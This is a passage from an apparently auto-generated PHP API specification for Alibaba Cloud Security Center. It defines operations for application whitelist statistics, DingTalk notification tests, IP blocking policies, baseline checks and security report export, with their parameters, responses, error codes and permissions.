'*'], ], ], ], ], ], 'DescribeWhiteListStrategyStatistics' => [ 'summary' => 'Queries the statistics of application whitelist policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains this value.', 'type' => 'string', 'required' => false, 'example' => '183.63.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyIds', 'in' => 'query', 'schema' => ['description' => 'The policy ID.'."\n" .'>You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '3645', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query. Maximum value: 1000. Default value: 20. If you leave this parameter empty, 20 entries are returned.'."\n" ."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Strategies' => [ 'description' => 'The list of policy statistics.', 'type' => 'array', 'items' => [ 'description' => 'The policy statistics.', 'type' => 'object', 'properties' => [ 'SuspiciousProcCount' => ['description' => 'The number of suspicious processes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Status' => ['description' => 'The policy status. Valid values:'."\n" .'- **0**: Not enabled.'."\n" .'- **1**: Learning.'."\n" .'- **2**: Paused.'."\n" .'- **3**: Learning completed.'."\n" .'- **4**: Active.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TrustProcCount' => ['description' => 'The number of trusted processes.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'StrategyName' => ['description' => 'The policy name.', 'type' => 'string', 'example' => 'win ', 'title' => ''], 'StrategyId' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '11906', 'title' => ''], 'Progress' => ['description' => 'The learning progress of the policy. Unit: percent.', 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], 'VirusProcCount' => ['description' => 'The number of malicious processes.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AssetCount' => ['description' => 'The number of servers on which the policy takes effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'StudyTime' => ['description' => 'The intelligent learning duration. Unit: hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query policy statistics information', 'description' => 'Application whitelist is a China-site public preview feature that is no longer open for new applications. Users who have already applied for or are using this feature can call this operation as usual.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListStrategyStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"TotalCount\\": 100,\\n \\"Count\\": 1,\\n \\"Strategies\\": [\\n {\\n \\"SuspiciousProcCount\\": 1,\\n \\"Status\\": 1,\\n \\"TrustProcCount\\": 2,\\n \\"StrategyName\\": \\"win \\",\\n \\"StrategyId\\": 11906,\\n \\"Progress\\": 80,\\n \\"VirusProcCount\\": 2,\\n \\"AssetCount\\": 9,\\n \\"StudyTime\\": 9\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeWhiteListStrategyUuidCount' => [ 'summary' => 'Queries the number of the servers on which an application whitelist policy takes effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '42.120.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyStatistics](~~DescribeWhiteListStrategyStatistics~~) operation to obtain the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '8516', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the policy. Valid values:'."\n" ."\n" .'* **1**: learning policy'."\n" .'* **2**: application policy'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'UuidCount' => ['description' => 'The number of the servers on which the application whitelist policy takes effect.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"UuidCount\\": 9,\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', 'title' => 'DescribeWhiteListStrategyUuidCount', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or the feature is in-use, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeWhiteListStrategyUuidCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DingTalkOnlineTest' => [ 'summary' => 'Tests whether DingTalk notification configurations are valid.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the DingTalk notification configuration.'."\n" .'> You can call the [DescribeDingTalk](~~DescribeDingTalk~~) operation to obtain the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '2373', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '2E96F605-1BE3-5954-83A5-AE96C617****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2E96F605-1BE3-5954-83A5-AE96C617****\\"\\n}","type":"json"}]', 'title' => 'DingTalkOnlineTest', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DingTalkOnlineTest'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DingTalkOnlineTest', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DisableBruteForceRecord' => [ 'summary' => 'Disables an IP address blocking policy that is in effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the IP address blocking policy.'."\n" ."\n" .'> You can call the [DescribeBruteForceRecords](~~DescribeBruteForceRecords~~) operation to query the policy ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '114166XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cbb9aa80-a8d1-443c-9ff0-2c36cd39****', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that you want to specify in the policy.'."\n", 'type' => 'string', 'required' => true, 'example' => '8.210.XX.XX', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number.'."\n", 'type' => 'string', 'required' => false, 'example' => '*/*', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that you want to specify in the policy. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => false, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '5EFF53F7-9B2A-58B5-AD06-6B07ACE17133', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5EFF53F7-9B2A-58B5-AD06-6B07ACE17133\\"\\n}","type":"json"}]', 'title' => 'DisableBruteForceRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DisableBruteForceRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:DisableBruteForceRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DisableCustomBlockRecord' => [ 'summary' => 'Disables a custom IP address blocking policy for servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that is specified in the policy.'."\n" ."\n" .'> You can call the [DescribeCustomBlockRecords](~~DescribeCustomBlockRecords~~) operation to query the IP address.'."\n", 'type' => 'string', 'required' => true, 'example' => '62.233.XX.XX', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that is specified in the policy. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => true, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F749D54C-3CA0-5F68-835C-AD35A2BD29EA', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F749D54C-3CA0-5F68-835C-AD35A2BD29EA\\"\\n}","type":"json"}]', 'title' => 'DisableCustomBlockRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DisableCustomBlockRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:DisableCustomBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'EnableBruteForceRecord' => [ 'summary' => 'Enables an IP address blocking policy for a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy that you want to enable.'."\n" ."\n" .'> You can call the [DescribeBruteForceRecords](~~DescribeBruteForceRecords~~) operation to query the IDs of policies.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '116602XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => true, 'example' => '71046acb-8bff-4c3b-9163-24deb007****', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that is specified in the policy.'."\n", 'type' => 'string', 'required' => true, 'example' => '61.155.XX.XX', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number.'."\n", 'type' => 'string', 'required' => false, 'example' => '22/22', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that is specified in the policy. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => false, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'DFAECA37-4660-5EB6-9A18-8FDF56B3****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DFAECA37-4660-5EB6-9A18-8FDF56B3****\\"\\n}","type":"json"}]', 'title' => 'EnableBruteForceRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableBruteForceRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:EnableBruteForceRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'EnableCustomBlockRecord' => [ 'summary' => 'Enables a custom IP address blocking policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that is specified in the policy.'."\n", 'type' => 'string', 'required' => true, 'example' => '43.248.XX.XX', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction that is specified in the policy. Valid values:'."\n" ."\n" .'* **in**: inbound'."\n" .'* **out**: outbound'."\n", 'type' => 'string', 'required' => true, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F02D5F26-70B9-53BD-9CDF-A316FD11****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F02D5F26-70B9-53BD-9CDF-A316FD11****\\"\\n}","type":"json"}]', 'title' => 'EnableCustomBlockRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableCustomBlockRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:EnableCustomBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'EnableCustomInstanceBlockRecord' => [ 'summary' => 'Enables a custom rule for an instance.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => true, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address that you want to block.'."\n", 'type' => 'string', 'required' => true, 'example' => '192.168.xx.xx', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The traffic direction from the IP address that you want to block. Valid value:'."\n" ."\n" .'* **in**'."\n" .'* **out**'."\n", 'type' => 'string', 'required' => false, 'example' => 'in', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\"\\n}","type":"json"}]', 'title' => 'EnableCustomInstanceBlockRecord', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:EnableCustomInstanceBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'EnableServiceAccessResourceDirectory' => [ 'summary' => 'Enables the multi-account management feature of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92279', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'EntityNotExists.ResourceDir', 'errorMessage' => 'The resource directory does not exist.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Enable the multi-account management feature of security center', 'description' => 'Call this operation by using the management account of the resource directory or a delegated administrator account of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableServiceAccessResourceDirectory'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:EnableServiceAccessResourceDirectory', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\"\\n}","type":"json"}]', ], 'ExecStrategy' => [ 'summary' => 'Performs a baseline check on machines within a specified policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92281', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n" .'>You can call the [DescribeStrategy](~~DescribeStrategy~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '215421', 'title' => ''], ], [ 'name' => 'ExecAction', 'in' => 'query', 'schema' => ['description' => 'The action to perform. Default value: **exec**. Valid values:'."\n" ."\n" .'- **exec**: exec.'."\n" .'- **terminate**: stop.', 'type' => 'string', 'required' => false, 'example' => 'terminate', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7F84EBCA-86F8-5AA0-BF74-A0276ECB****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ['errorCode' => 'StrategyRunning', 'errorMessage' => 'Strategy is running.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Execute a baseline check policy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '2', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExecStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ExecStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7F84EBCA-86F8-5AA0-BF74-A0276ECB****\\"\\n}","type":"json"}]', ], 'ExportCustomizeReport' => [ 'summary' => 'Exports a security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92282', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the security report.'."\n" ."\n" .'> You can call the [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'ExportType', 'in' => 'query', 'schema' => ['description' => 'The type of the security report that you want to export. Valid values:'."\n" ."\n" .'* **HTML**'."\n" .'* **PDF**'."\n" ."\n" .'> The default value is HTML. PDF is supported only for security reports in version 2.0.0.'."\n", 'type' => 'string', 'required' => false, 'example' => 'HTML', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'ExportId' => ['description' => 'The ID of the export task.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '22', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'FFDFCEB3-A5EE-590A-8E70-283EBC5D****', 'title' => ''], 'DownloadUrl' => ['description' => 'The download URL of the security report.'."\n", 'type' => 'string', 'example' => 'https://xxxxxxxx.oss-cn-hangzhou-1.aliyuncs.com/xxxxx/xxxxxxxxxxxxxx?Expires=1671448125&OSSAccessKeyId=xxx', 'title' => ''], 'UrlExpiredTime' => ['description' => 'The timestamp when the download URL expires. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1673335497000', 'title' => ''], 'ExportDate' => ['description' => 'The time when the security report was exported.'."\n", 'type' => 'string', 'example' => '2023-01-10', 'title' => ''], 'ReportId' => ['description' => 'The ID of the security report.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'FileName' => ['description' => 'The name of the report file that is exported.'."\n", 'type' => 'string', 'example' => 'test_xxxx.html', 'title' => ''], 'ExportStatus' => ['description' => 'The status of the export task. Valid values:'."\n" ."\n" .'* **fail**: The export task fails.'."\n" .'* **exporting**: The export task is being executed.'."\n" .'* **success**: The export task is successful.'."\n", 'type' => 'string', 'example' => 'exporting', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n 